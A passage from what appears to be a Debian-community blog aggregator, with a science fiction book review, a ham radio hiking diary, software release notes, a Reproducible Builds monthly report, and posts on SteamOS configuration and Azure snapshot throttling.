opening up the reporting process, and have read up on some of the specifications, but nothing much is working yet. These were just the top of the iceberg, but I guess this blog post is long enough now. If you would like to help with any of these projects, please get in touch, either directly on the project mailing lists and forums, or with me via email, IRC or Signal. :) As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

Russ Allbery: Review: The Scavenger Door

Review: The Scavenger Door, by Suzanne Palmer
Series: Finder Chronicles #3
Publisher: DAW
Copyright: 2021
ISBN: 0-7564-1516-0
Format: Kindle
Pages: 458
The Scavenger Door is a science fiction adventure and the third book of the Finder Chronicles. While each of the books of this series stand alone reasonably well, I would still read the series in order. Each book has some spoilers for the previous book. Fergus is back on Earth following the events of Driving the Deep, at loose ends and annoying his relatives. To get him out of their hair, his cousin sends him into the Scottish hills to find a friend's missing flock of sheep. Fergus finds things professionally, but usually not livestock. It's an easy enough job, though; the lead sheep was wearing a tracker and he just has to get close enough to pick it up. The unexpected twist is also finding a metal fragment buried in a hillside that has some strange resonance with the unwanted gift that Fergus got in Finder. Fergus's alien friend Ignatio is so alarmed by the metal fragment that he turns up in person in Fergus's cousin's bar in Scotland. Before he arrives, Fergus gets a mysteriously infuriating warning visit from alien acquaintances he does not consider friends. He has, as usual, stepped into something dangerous and complicated, and now somehow it's become his problem. So, first, we get lots of Ignatio, who is an enthusiastic large ball of green fuzz with five limbs who mostly speaks English but does so from an odd angle. This makes me happy because I love Ignatio and his tendency to take things just a bit too literally.
SANTO'S, the sign read. Under it, in smaller letters, was CURIOSITIES AND INCONVENIENCES FOR COMMENDABLE SUMS. "Inconveniences sound just like my thing," Fergus said. "You two want to wait in the car while I check it out?" "Oh, no, I am not missing this," Isla said, and got out of the podcar. "I am uncertain," Ignatio said. "I would like some curiouses, but not any inconveniences. Please proceed while I decide, and if there is also murdering or calamity or raisins, you will yell right away, yes?"
Also, if your story setup requires a partly-understood alien artifact that the protagonist can get some explanations for but not have the mystery neatly solved for them, Ignatio's explanations are perfect.
"It is a door. A doorbell. A... peephole? A key. A control light. A signal. A stop-and-go sign. A road. A bridge. A beacon. A call. A map. A channel. A way," Ignatio said. "It is a problem to explain. To say a doorkey is best, and also wrong. If put together, a path may be opened." "And then?" "And then the bad things on the other side, who we were trying to lock away, will be free to travel through."
Second, the thing about Palmer's writing that continues to impress me is her ability to take a standard science fiction plot, one whose variations I've read probably dozens of times before, and still make it utterly engrossing. This book is literally a fetch quest. There are a bunch of scattered fragments, Fergus has to find them and keep them from being assembled, various other people are after the same fragments, and Fergus either has to get there first or get the fragments back from them. If you haven't read this book before, you've played the video game or watched the movie. The threat is basically a Stargate SG-1 plot. And yet, this was so much fun. The characters are great. This book leans less on found family than the last one and a bit more on actual family. When I started reading this series, Fergus felt a bit bland in the way that adventure protagonists sometimes can, but he's fleshed out nicely as the series goes along. He's not someone who tends to indulge in big emotions, but now the reader can tell that's because he's the kind of person who finds things to do in order to keep from dwelling on things he doesn't want to think about. He's unflappable in a quietly competent way while still having a backstory and emotional baggage and a rich inner life that the reader sees in glancing fragments. We get more of Fergus's backstory, particularly around Mars, but I like that it's told in anecdotes and small pieces. The last thing Fergus wants to do is wallow in his past trauma, so he doesn't and finds something to do instead. There's just enough detail around the edges to deepen his character without turning the book into a story about Fergus's emotions and childhood. It's a tricky balancing act that Palmer handles well. There are also more sentient ships, and I am so in favor of more sentient ships.
"When I am adding a new skill, I import diagnostic and environmental information specific to my platform and topology, segregate the skill subroutines to a dedicated, protected logical space, run incremental testing on integration under all projected scenarios and variables, and then when I am persuaded the code is benevolent, an asset, and provides the functionality I was seeking, I roll it into my primary processing units," Whiro said. "You cannot do any of that, because if I may speak in purely objective terms you may incorrectly interpret as personal, you are made of squishy, unreliable goo."
We get the normal pieces of a well-done fetch quest: wildly varying locations, some great local characters (the US-based trauma surgeons on vacation in Australia were my favorites), and believable antagonists. There are two other groups looking for the fragments, and while one of them is the standard villain in this sort of story, the other is an apocalyptic cult whose members Fergus mostly feels sorry for and who add just the right amount of surreality to the story. The more we find out about them, the more believable they are, and the more they make this world feel like realistic messy chaos instead of the obvious (and boring) good versus evil patterns that a lot of adventure plots collapse into. There are things about this book that I feel like I should be criticizing, but I just can't. Fetch quests are usually synonymous with lazy plotting, and yet it worked for me. The way Fergus gets dumped into the middle of this problem starts out feeling as arbitrary and unmotivated as some video game fetch quest stories, but by the end of the book it starts to make sense. The story could arguably be described as episodic and cliched, and yet I was thoroughly invested. There are a few pacing problems at the very end, but I was too invested to care that much. This feels like a book that's better than the sum of its parts. Most of the story is future-Earth adventure with some heist elements. The ending goes in a rather different direction but stays at the center of the classic science fiction genre. The Scavenger Door reaches a satisfying conclusion, but there are a ton of unanswered questions that will send me on to the fourth (and reportedly final) novel in the series shortly. This is great stuff. It's not going to win literary awards, but if you're in the mood for some classic science fiction with fun aliens and neat ideas, but also benefiting from the massive improvements in characterization the genre has seen in the past forty years, this series is perfect. Highly recommended. Followed by Ghostdrift. Rating: 9 out of 10

9 February 2025

Dave Hibberd: Radio Activity 10-16 Feb 2025

It s been quite the week of radio related nonsense for me, where I ve been channelling my time and brainspace for radio into activity on air and system refinements, not working on Debian.

POTA, Antennas and why do my toys not work? Having had my interest piqued by Ian at mastodon.radio, I looked online and spotted a couple of parks within stumbling distance of my house, that s good news! It looks like the list has been refactored and expanded since I last looked at it, so there are now more entities to activate and explore. My concerns about antennas noted last week rumbled on. There was a second strand to this concern too, my end fed 64:1 (or 49:1?!) transformer from MM0OPX sits in my mind as not having worked very well in Spain last year, and I want to get to the bottom of why. As with most things in my life, it s probably a me problem. I came up with a cunning plan - firstly, buy a new mast to replace the one I broke a few weeks back on Cat Law. Secondly, buy a couple of new connectors and some heatshrink to reterminate my cable that I m sure is broken. Spending more money on a problem never hurt anyone, right? Come Wednesday, the new toys arrived and I figured combining everything into one convenient night time walk and radio was a good plan. So I walk out to the nearest park with my LoRa APRS doofer going and see what happens: APRS-Map After circling a bit to find somewhere suitable (there appear to be construction works in the park!) I set up my gear in 2C with frost on the ground, called CQ, spotted and got nothing on either the end fed half wave or the cheap vertical. As it was too late for 20m, I tried 40 and a bit of 80 using the inbuilt tuner, but wasn t heard by stations I called or when calling independently. I packed everything up and lora-doofered my way home, mildly deflated.

Try it at home It still didn t sit with me that the end fed wasn t working, so come Friday night I set it up in the back garden/woods behind the house to try and diagnose why it wasn t working. Up it went, I worked some Irish stations pretty effortlessly, and down everything came. No complaints - the only things I did differently was have the feedpoint a little higher and check my power, limiting it to 10W. The G90 can do 20W, I wonder if running at that was saturating the core in the 64:1. At some point in the evening I stepped in some dog s shit too, and spent some time cleaning my boots outside to avoid further tramping the smell through the house. Win some, lose some.

Take it to the Hills On Friday, some of the other GM-ES Sota-ists had been out for an activity day. On account of me being busy in work, I couldn t go outside to play, but I figured a weekend of activity was on the books.

Saturday - A day above the clouds On Saturday I took myself up Tap O Noth, a favourite of mine for some reason, and Lord Arthur s Hill. Before I hit the hills, I took myself to the hackerspace and printed myself a K6ARK Winder and a guy ring for the mast, cut string, tied it together and wound the string on to the winder. I also took time to buzz out my wonky coax and it showed great continuity. Hmm, that can be continued later. I didn t quite get to crimping the radial network of the Aliexpress whip with a 12mm stud crimp, that can also be put on the TODO list.

Tap O Noth Once finally out, the weather was a bit cloudy with passing snow showers, but in between the showers I was above the clouds and the air was clear: After a mild struggle on 2m, I set up the end fed the first hill and got to work from the old hill fort: The end fed worked flawlessly. Exactly as promised, switching between 7MHz, 14MHz, 21MHz and 28MHz without a tuner was perfect, I chased hills on all the bands, and had a great time. Apart from 40m, where there was absolutely no space due to a contest. That wasn t such a fun time! My fingers were bitterly cold, so on went the big gloves for the descent and I felt like I was warm by the time I made it back to the car. It worked so well, in fact, I took the 1/4 wave cheap vertical out my bag and decided to brave it on the next activation.

Lord Arthur s Hill GM5ALX has posted a .gpx to sotlas which is shorter than the other ascent, but much sharper - I figured this would be a fun new way to try up the hill! It takes you right through the heart of the Littlewood Park estate, and I felt a bit uncomfortable walking straight past the estate cottages, especially when there were vehicles moving and active work happening. Presumably this is where Lord Arthur lived, at the foot of his hill. I cut through the woods to the west of the cottages, disturbing some deer and many, many pheasants, but I met the path fairly quickly. From there it was a 2km walk, 300m vertical ascent. Short and sharp! At the top, I was treated to a view of the hill I had activated only an hour or so before, which is a view that always makes me smile: To get some height for the feedpoint, I wrapped the coax around my winder a couple of turns and trapped it with the elastic while draping the coax over the trig. This bought me some more height and I felt clever because of it. Maybe a pole would be easier? From here, I worked inter-G on 40m and had a wee pile up, eventually working 15 or so European stations on 20m. Pleased with that! I had been considering a third hill, but home was the call in the failing light. Back to the car I walked to find my key didn t have any battery, so out came the Audi App and I used the Internet of Things to unlock my car. The modern world is bizarre.

Sunday - Cloudy Head // Head in the Clouds Sunday started off migraney, so I stayed within the confines of my house until I felt safe driving! After some back and forth in my cloudy head, I opted for the easier option of Ladylea Hill as I wasn t feeling up for major physical exertion. It was a long drive, after which I felt more wonky, but I hit the path eventually - I run to Hibby Standard Time, a few hours to a few days behind the rest of GM/ES. I was ready to bail if my head didn t improve, but it turns out, fresh cold air, silence and bloodflow helped. Ladylea Hill was incredibly quiet, a feature I really appreciated. It feels incredibly remote, with a long winding drive down Glenbuchat, which still has ice on the surface of the lochs and standing water. A brooding summit crowned with grey cloud in fantastic scenery that only revealed itself upon the clouds blowing through: I set up at the cairn and picked up 30 contacts overall, split between 40m and 20m, with some inter-g on 40 and a couple of continental surprises. 20 had longer skip today, so I saw Spain, Finland, Slovenia, Poland. On teardown, I managed to snap the top segment of my brand new mast with my cold, clumsy fingers, but thankfully sotabeams stock replacements. More money at the problem, again. Back to the car, no app needed, and homeward bound as the light faded. At the end of the weekend, I find myself finally over 100 activator points and over 400 chaser points. Somehow I ve collected more points this year already than last year, the winter bonuses really do stack up!

Addendum - OSMAnd & Open Street Map I ve been using OSMAnd on my iPhone quite extensively recently, I think offline mapping is super important if you re going out to get mildly lost in the hills. On more than one occasion, I have confidently set off in the wrong direction in the mist, and maps have saved my bacon! As you can download .gpx files, it s great to have them on the device and available for guidance in case you get lost, coupled with an offline map. Plus, as I drive around I love to have the dark red of a hill I ve walked appear on the map in my car dash or in my hand: This weekend I discovered it s possible to have height maps for nice 3d maps and contours marked on the map - you just need to download some additions for the maps. This is a really nice feature, it makes maps more pretty and more useful when you re in the middle of nowhere. Open Street Map also has designators for SOTA summits here and similar for POTA here GM5ALX has set to adding the summits around Scotland here. While the benefits aren t immediately obvious, it allows developers of mapping applications access to more data at no extra cost, really. It helps add depth to an already rich set of information, and allows us as radio amateurs to do more interesting things with maps and not be shackled to Apple/Google. Because it s open data, we can also fix things we find wrong as users. I like to fix road surfaces after I ve been cycling as that will feed forward to route planning through Komoot and data on my wahoo too, which can be modified with osm maps. In the future, it s possible to have an OSMAnd plugin highlighting local SOTA summits or mimicking features of sotl.as but offline. It s cool to be able to put open technologies to use like this in the field and really is the convergence point of all my favourite things!

Petter Reinholdtsen: New oggz release 1.1.2 after 15 years

A little over a week ago, I noticed the liboggz package on my Debian dashboard had not had a new upstream release for a while. A closer look showed that its last release, version 1.1.1, happened in 2010. A few patches had accumulated in the Debian package, and I even noticed that I had passed on these patches to upstream five years ago. A handful crash bugs had been reported against the Debian package, and looking at the upstream repository I even found a few crash bugs reported there too. To add insult to injury, I discovered that upstream had accumulated several fixes in the years between 2010 and now, and many of them had not made their way into the Debian package. I decided enough was enough, and that a new upstream release was needed fixing these nasty crash bugs. Luckily I am also a member of the Xiph team, aka upstream, and could actually go to work immediately to fix it. I started by adding automatic build testing on the Xiph gitlab oggz instance, to get a better idea of the state of affairs with the code base. This exposed a few build problems, which I had to fix. In parallel to this, I sent an email announcing my wish for a new release to every person who had committed to the upstream code base since 2010, and asked for help doing a new release both on email and on the #xiph IRC channel. Sadly only a fraction of their email providers accepted my email. But Ralph Giles in the Xiph team came to the rescue and provided invaluable help to guide be through the release Xiph process. While this was going on, I spent a few days tracking down the crash bugs with good help from valgrind, and came up with patch proposals to get rid of at least these specific crash bugs. The open issues also had to be checked. Several of them proved to be fixed already, but a few I had to creat patches for. I also checked out the Debian, Arch, Fedora, Suse and Gentoo packages to see if there were patches applied in these Linux distributions that should be passed upstream. The end result was ready yesterday. A new liboggz release, version 1.1.2, was tagged, wrapped up and published on the project page. And today, the new release was uploaded into Debian. You are probably by now curious on what actually changed in the library. I guess the most interesting new feature was support for Opus and VP8. Almost all other changes were stability or documentation fixes. The rest were related to the gitlab continuous integration testing. All in all, this was really a minor update, hence the version bump only from 1.1.1 to to 1.1.2, but it was long overdue and I am very happy that it is out the door. One change proposed upstream was not included this time, as it extended the API and changed some of the existing library methods, and thus require a major SONAME bump and possibly code changes in every program using the library. As I am not that familiar with the code base, I am unsure if I am the right person to evaluate the change. Perhaps later. Since the release was tagged, a few minor fixes has been committed upstream already: automatic testing the cross building to Windows, and documentation updates linking to the correct project page. If a important issue is discovered with this release, I guess a new release might happen soon including the minor fixes. If not, perhaps they can wait fifteen years. :) I would like to send a big thank you to everyone that helped make this release happen, from the people adding fixes upstream over the course of fifteen years, to the ones reporting crash bugs, other bugs and those maintaining the package in various Linux distributions. Thank you very much for your time and interest. As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

8 February 2025

Thorsten Alteholz: My Debian Activities in January 2025

Debian LTS This was my hundred-twenty-seventh month that I did some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian. During my allocated time I uploaded or worked on: As new CVEs for ffmpeg appeared, I started to work again for an update of this package Last but not least I did a week of FD this month and attended the monthly LTS/ELTS meeting. Debian ELTS This month was the seventy-eighth ELTS month. During my allocated time I uploaded or worked on: As new CVEs for ffmpeg appeared, I started to work again for an update of this package Last but not least I did a week of FD this month and attended the monthly LTS/ELTS meeting. Debian Printing This month I uploaded new packages or new upstream or bugfix versions of: This work is generously funded by Freexian! Debian Matomo This month I uploaded new packages or new upstream or bugfix versions of: This work is generously funded by Freexian! Debian Astro This month I uploaded new packages or new upstream or bugfix versions of: Patrick, our Outreachy intern for the Debian Astro project, is doing very well and deals with task after task. He is working on automatic updates of the indi 3rd-party drivers and maybe the results of his work will already be part of Trixie. Debian IoT Unfortunately I didn t found any time to work on this topic. Debian Mobcom This month I uploaded new packages or new upstream or bugfix versions of: misc This month I uploaded new upstream or bugfix versions of: FTP master This month I accepted 385 and rejected 37 packages. The overall number of packages that got accepted was 402.

Erich Schubert: Azul s State-of-Java report is nonsense

Azul s State-of-Java report is full of nonsense, and no worth looking at. The report claims various stuff about the adoption of AI in the Java ecosystem. But its results do not make any sense when looked at in detail. For example (in the AI section): I can only guess that people picked some random plausible answer, but were not actually using any of that. Probably because of bad incentives:
Participants were offered token compensation for their participation.
Seems like Dimensional Research, the company who did that survey, screwed up badly.

6 February 2025

Dirk Eddelbuettel: RcppArmadillo 14.2.3-1 on CRAN: Small Upstream Fix

armadillo image Armadillo is a powerful and expressive C++ template library for linear algebra and scientific computing. It aims towards a good balance between speed and ease of use, has a syntax deliberately close to Matlab, and is useful for algorithm development directly in C++, or quick conversion of research code into production environments. RcppArmadillo integrates this library with the R environment and language and is widely used by (currently) 1215 other packages on CRAN, downloaded 38.2 million times (per the partial logs from the cloud mirrors of CRAN), and the CSDA paper (preprint / vignette) by Conrad and myself has been cited 612 times according to Google Scholar. Conrad released a minor version 14.2.3 yesterday. As it has been two months since the last minor release, we prepared a new version for CRAN too which arrived there early this morning. The changes since the last CRAN release are summarised below.

Changes in RcppArmadillo version 14.2.3-1 (2025-02-05)
  • Upgraded to Armadillo release 14.2.3 (Smooth Caffeine)
    • Minor fix for declaration of xSYCON and xHECON functions in LAPACK
    • Fix for rare corner-case in reshape()

Courtesy of my CRANberries, there is a diffstat report relative to previous release. More detailed information is on the RcppArmadillo page. Questions, comments etc should go to the rcpp-devel mailing list off the Rcpp R-Forge page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.

Dominique Dumont: Drawbacks of using Cookiecutter with Cruft

Hi Cookiecutter is a tool for building coding project templates. It s often used to provide a scaffolding to build lots of similar project. I ve seen it used to create Symfony projects and several cloud infrastructures deployed with Terraform. This tool was useful to accelerate the creation of new projects.  Since these templates were bound to evolve, the teams providing these template relied on cruft to update the code provided by the template in their user s code. In other words, they wanted their users to apply a diff of the template modification to their code. At the beginning, all was fine. But problems began to appear during the lifetime of these projects. What went wrong ? In both cases, we had the following scenario: User team giving up on updates is a major problem because these update may bring security or compliance fixes.  Note that code conflicts seen with cruft are similar to git merge conflicts, but harder to resolve because, unlike with a git merge, there s no common ancestor, so 3-way merges are not possible. From an organisation point of view, the main problem is the ambiguous ownership of the functionalities brought by template code: who own this code ? The provider team who writes the template or the user team who owns the repository of the code generated from the template ? Conflicts are bound to happen. Possible solutions to get out of this tar pit: Of course your users won t be happy to be faced with a manual migration from the old big template to the new one with external dependencies. On the other hand, this may be easier to sell than updates based on cruft since the painful work will happen once. Further updates will be done by incrementing dependency versions (which can be automated with renovate). If many projects are to be created with this template, it may be more practical to provide use a CLI that will create a skeleton project. See for instance terragrunt scaffold command. My name is Dominique Dumont, I m a devops freelance. You can find the devops and audit services I propose on my website or reach out to me on LinkedIn. All the best

5 February 2025

Alberto Garc a: Keeping your system-wide configuration files intact after updating SteamOS

Introduction If you use SteamOS and you like to install third-party tools or modify the system-wide configuration some of your changes might be lost after an OS update. Read on for details on why this happens and what to do about it.
As you all know SteamOS uses an immutable root filesystem and users are not expected to modify it because all changes are lost after an OS update. However this does not include configuration files: the /etc directory is not part of the root filesystem itself. Instead, it s a writable overlay and all modifications are actually stored under /var (together with all the usual contents that go in that filesystem such as logs, cached data, etc). /etc contains important data that is specific to that particular machine like the configuration of known network connections, the password of the main user and the SSH keys. This configuration needs to be kept after an OS update so the system can keep working as expected. However the update process also needs to make sure that other changes to /etc don t conflict with whatever is available in the new version of the OS, and there have been issues due to some modifications unexpectedly persisting after a system update. SteamOS 3.6 introduced a new mechanism to decide what to to keep after an OS update, and the system now keeps a list of configuration files that are allowed to be kept in the new version. The idea is that only the modifications that are known to be important for the correct operation of the system are applied, and everything else is discarded1. However, many users want to be able to keep additional configuration files after an OS update, either because the changes are important for them or because those files are needed for some third-party tool that they have installed. Fortunately the system provides a way to do that, and users (or developers of third-party tools) can add a configuration file to /etc/atomic-update.conf.d, listing the additional files that need to be kept. There is an example in /etc/atomic-update.conf.d/example-additional-keep-list.conf that shows what this configuration looks like.
Sample configuration file for the SteamOS updater
Developers who are targeting SteamOS can also use this same method to make sure that their configuration files survive OS updates. As an example of an actual third-party project that makes use of this mechanism you can have a look at the DeterminateSystems Nix installer: https://github.com/DeterminateSystems/nix-installer/blob/v0.34.0/src/planner/steam_deck.rs#L273 As usual, if you encounter issues with this or any other part of the system you can check the SteamOS issue tracker. Enjoy!
  1. A copy is actually kept under /etc/previous to give the user the chance to recover files if necessary, and up to five previous snapshots are kept under /var/lib/steamos-atomupd/etc_backup

Reproducible Builds: Reproducible Builds in January 2025

Welcome to the first report in 2025 from the Reproducible Builds project! Our monthly reports outline what we ve been up to over the past month and highlight items of news from elsewhere in the world of software supply-chain security when relevant. As usual, though, if you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. Table of contents:
  1. reproduce.debian.net
  2. Two new academic papers
  3. Distribution work
  4. On our mailing list
  5. Upstream patches
  6. diffoscope
  7. Website updates
  8. Reproducibility testing framework

reproduce.debian.net The last few months saw the introduction of reproduce.debian.net. Announced at the recent Debian MiniDebConf in Toulouse, reproduce.debian.net is an instance of rebuilderd operated by the Reproducible Builds project. Powering that is rebuilderd, our server designed monitor the official package repositories of Linux distributions and attempt to reproduce the observed results there. This month, however, we are pleased to announce that in addition to the existing amd64.reproduce.debian.net and i386.reproduce.debian.net architecture-specific pages, we now build for a three more architectures (for a total of five) arm64 armhf and riscv64.

Two new academic papers Giacomo Benedetti, Oreofe Solarin, Courtney Miller, Greg Tystahl, William Enck, Christian K stner, Alexandros Kapravelos, Alessio Merlo and Luca Verderame published an interesting article recently. Titled An Empirical Study on Reproducible Packaging in Open-Source Ecosystem, the abstract outlines its optimistic findings:
[We] identified that with relatively straightforward infrastructure configuration and patching of build tools, we can achieve very high rates of reproducible builds in all studied ecosystems. We conclude that if the ecosystems adopt our suggestions, the build process of published packages can be independently confirmed for nearly all packages without individual developer actions, and doing so will prevent significant future software supply chain attacks.
The entire PDF is available online to view.
In addition, Julien Malka, Stefano Zacchiroli and Th o Zimmermann of T l com Paris in-house research laboratory, the Information Processing and Communications Laboratory (LTCI) published an article asking the question: Does Functional Package Management Enable Reproducible Builds at Scale?. Answering strongly in the affirmative, the article s abstract reads as follows:
In this work, we perform the first large-scale study of bitwise reproducibility, in the context of the Nix functional package manager, rebuilding 709,816 packages from historical snapshots of the nixpkgs repository[. We] obtain very high bitwise reproducibility rates, between 69 and 91% with an upward trend, and even higher rebuildability rates, over 99%. We investigate unreproducibility causes, showing that about 15% of failures are due to embedded build dates. We release a novel dataset with all build statuses, logs, as well as full diffoscopes: recursive diffs of where unreproducible build artifacts differ.
As above, the entire PDF of the article is available to view online.

Distribution work There as been the usual work in various distributions this month, such as:
  • 10+ reviews of Debian packages were added, 11 were updated and 10 were removed this month adding to our knowledge about identified issues. A number of issue types were updated also.
  • The FreeBSD Foundation announced that a planned project to deliver zero-trust builds has begun in January 2025 . Supported by the Sovereign Tech Agency, this project is centered on the various build processes, and that the primary goal of this work is to enable the entire release process to run without requiring root access, and that build artifacts build reproducibly that is, that a third party can build bit-for-bit identical artifacts. The full announcement can be found online, which includes an estimated schedule and other details.

On our mailing list On our mailing list this month:
  • Following-up to a substantial amount of previous work pertaining the Sphinx documentation generator, James Addison asked a question pertaining to the relationship between SOURCE_DATE_EPOCH environment variable and testing that generated a number of replies.
  • Adithya Balakumar of Toshiba asked a question about whether it is possible to make ext4 filesystem images reproducible. Adithya s issue is that even the smallest amount of post-processing of the filesystem results in the modification of the Last mount and Last write timestamps.
  • James Addison also investigated an interesting issue surrounding our disorderfs filesystem. In particular:
    FUSE (Filesystem in USErspace) filesystems such as disorderfs do not delete files from the underlying filesystem when they are deleted from the overlay. This can cause seemingly straightforward tests for example, cases that expect directory contents to be empty after deletion is requested for all files listed within them to fail.

Upstream patches The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where appropriate. This month, we wrote a large number of such patches, including:

diffoscope diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made the following changes, including preparing and uploading versions 285, 286 and 287 to Debian:
  • Security fixes:
    • Validate the --css command-line argument to prevent a potential Cross-site scripting (XSS) attack. Thanks to Daniel Schmidt from SRLabs for the report. [ ]
    • Prevent XML entity expansion attacks. Thanks to Florian Wilkens from SRLabs for the report.. [ ][ ]
    • Print a warning if we have disabled XML comparisons due to a potentially vulnerable version of pyexpat. [ ]
  • Bug fixes:
    • Correctly identify changes to only the line-endings of files; don t mark them as Ordering differences only. [ ]
    • When passing files on the command line, don t call specialize( ) before we ve checked that the files are identical or not. [ ]
    • Do not exit with a traceback if paths are inaccessible, either directly, via symbolic links or within a directory. [ ]
    • Don t cause a traceback if cbfstool extraction failed.. [ ]
    • Use the surrogateescape mechanism to avoid a UnicodeDecodeError and crash when any decoding zipinfo output that is not UTF-8 compliant. [ ]
  • Testsuite improvements:
    • Don t mangle newlines when opening test fixtures; we want them untouched. [ ]
    • Move to assert_diff in test_text.py. [ ]
  • Misc improvements:
    • Drop unused subprocess imports. [ ][ ]
    • Drop an unused function in iso9600.py. [ ]
    • Inline a call and check of Config().force_details; no need for an additional variable in this particular method. [ ]
    • Remove an unnecessary return value from the Difference.check_for_ordering_differences method. [ ]
    • Remove unused logging facility from a few comparators. [ ]
    • Update copyright years. [ ][ ]
In addition, fridtjof added support for the ASAR .tar-like archive format. [ ][ ][ ][ ] and lastly, Vagrant Cascadian updated diffoscope in GNU Guix to version 285 [ ][ ] and 286 [ ][ ].
strip-nondeterminism is our sister tool to remove specific non-deterministic results from a completed build. This month version 1.14.1-1 was uploaded to Debian unstable by Chris Lamb, making the following the changes:
  • Clarify the --verbose and non --verbose output of bin/strip-nondeterminism so we don t imply we are normalizing files that we are not. [ ]
  • Bump Standards-Version to 4.7.0. [ ]

Website updates There were a large number of improvements made to our website this month, including:

Reproducibility testing framework The Reproducible Builds project operates a comprehensive testing framework running primarily at tests.reproducible-builds.org in order to check packages and other artifacts for reproducibility. In January, a number of changes were made by Holger Levsen, including:
  • reproduce.debian.net-related:
    • Add support for rebuilding the armhf architecture. [ ][ ]
    • Add support for rebuilding the arm64 architecture. [ ][ ][ ][ ]
    • Add support for rebuilding the riscv64 architecture. [ ][ ]
    • Move the i386 builder to the osuosl5 node. [ ][ ][ ][ ]
    • Don t run our rebuilders on a public port. [ ][ ]
    • Add database backups on all builders and add links. [ ][ ]
    • Rework and dramatically improve the statistics collection and generation. [ ][ ][ ][ ][ ][ ]
    • Add contact info to the main page [ ], thumbnails [ ] as well as the new, missing architectures. [ ]
    • Move the amd64 worker to the osuosl4 and node. [ ]
    • Run the underlying debrebuild script under nice. [ ]
    • Try to use TMPDIR when calling debrebuild. [ ][ ]
  • buildinfos.debian.net-related:
    • Stop creating buildinfo-pool_$ suite _$ arch .list files. [ ]
    • Temporarily disable automatic updates of pool links. [ ]
  • FreeBSD-related:
    • Fix the sudoers to actually permit builds. [ ]
    • Disable debug output for FreeBSD rebuilding jobs. [ ]
    • Upgrade to FreeBSD 14.2 [ ] and document that bmake was installed on the underlying FreeBSD virtual machine image [ ].
  • Misc:
    • Update the real year to 2025. [ ]
    • Don t try to install a Debian bookworm kernel from backports on the infom08 node which is running Debian trixie. [ ]
    • Don t warn about system updates for systems running Debian testing. [ ]
    • Fix a typo in the ZOMBIES definition. [ ][ ]
In addition:
  • Ed Maste modified the FreeBSD build system to the clean the object directory before commencing a build. [ ]
  • Gioele Barabucci updated the rebuilder stats to first add a category for network errors [ ] as well as to categorise failures without a diffoscope log [ ].
  • Jessica Clarke also made some FreeBSD-related changes, including:
    • Ensuring we clean up the object directory for second build as well. [ ][ ]
    • Updating the sudoers for the relevant rm -rf command. [ ]
    • Update the cleanup_tmpdirs method to to match other removals. [ ]
  • Jochen Sprickerhof:
  • Roland Clobus:
    • Update the reproducible_debstrap job to call Debian s debootstrap with the full path [ ] and to use eatmydata as well [ ][ ].
    • Make some changes to deduce the CPU load in the debian_live_build job. [ ]
Lastly, both Holger Levsen [ ] and Vagrant Cascadian [ ] performed some node maintenance.
If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. However, you can get in touch with us via:

4 February 2025

Dominique Dumont: Azure API throttling strikes back

Hi In my last blog, I explained how we resolved a throttling issue involving Azure storage API. In the end, I mentioned that I was not sure of the root cause of the throttling issue. Even though we no longer had any problem in dev and preprod cluster, we still faced throttling issue with prod. The main difference between these 2 environments is that we have about 80 PVs in prod versus 15 in the other environments. Given that we manage 1500 pods in prod, 80 PVs does not look like a lot.  To continue the investigation, I ve modified k8s-scheduled-volume-snapshotter to limit the number of snaphots done in a single cron run (see add maxSnapshotCount parameter pull request). In prod, we used the modified snapshotter to trigger snapshots one by one. Even with all previous snapshots cleaned up, we could not trigger a single new snapshot without being throttled . I guess that, in the cron job, just checking the list of PV to snapshot was enough to exhaust our API quota.  Azure doc mention that a leaky bucket algorithm is used for throttling. A full bucket holds tokens for 250 API calls, and the bucket gets 25 new tokens per second. Looks like that not enough. I was puzzled  and out of ideas  . I looked for similar problems in AKS issues on GitHub where I found this comment that recommend using useDataPlaneAPI parameter in the CSI file driver. That was it!  I was flabbergasted  by this parameter: why is CSI file driver able to use 2 APIs ? Why is one on them so limited ? And more importantly, why is the limited API the default one ? Anyway, setting useDataPlaneAPI: "true" in our VolumeSnapshotClass manifest was the right solution. This indeed solved the throttling issue in our prod cluster.  But not the snaphot issue  . Amongst the 80 PV, I still had 2 snaphots failing. Fortunately, the error was mentioned in the description of the failed snapshots: we had too many (200) snapshots for these shared volumes. What ??  All these snapshots were cleaned up last week. I then tried to delete these snaphots through azure console. But the console failed to delete these snapshot due to API throttling. Looks like Azure console is not using the right API.  Anyway, I went back to the solution explained in my previous blog, I listed all snapshots with az command. I indeed has a lot of snaphots, a lot of them dated Jan 19 and 20. There was often a new bogus snaphot created every minute. These were created during the first attempt at fixing the throttling issue. I guess that even though CSI file driver was throttled, a snaphot was still created in the storage account, but the CSI driver did not see it and retried a minute later . What a mess. Anyway, I ve cleaned up again these bogus snapshot  , and now, snaphot creation is working fine  . For now. All the best.

Next.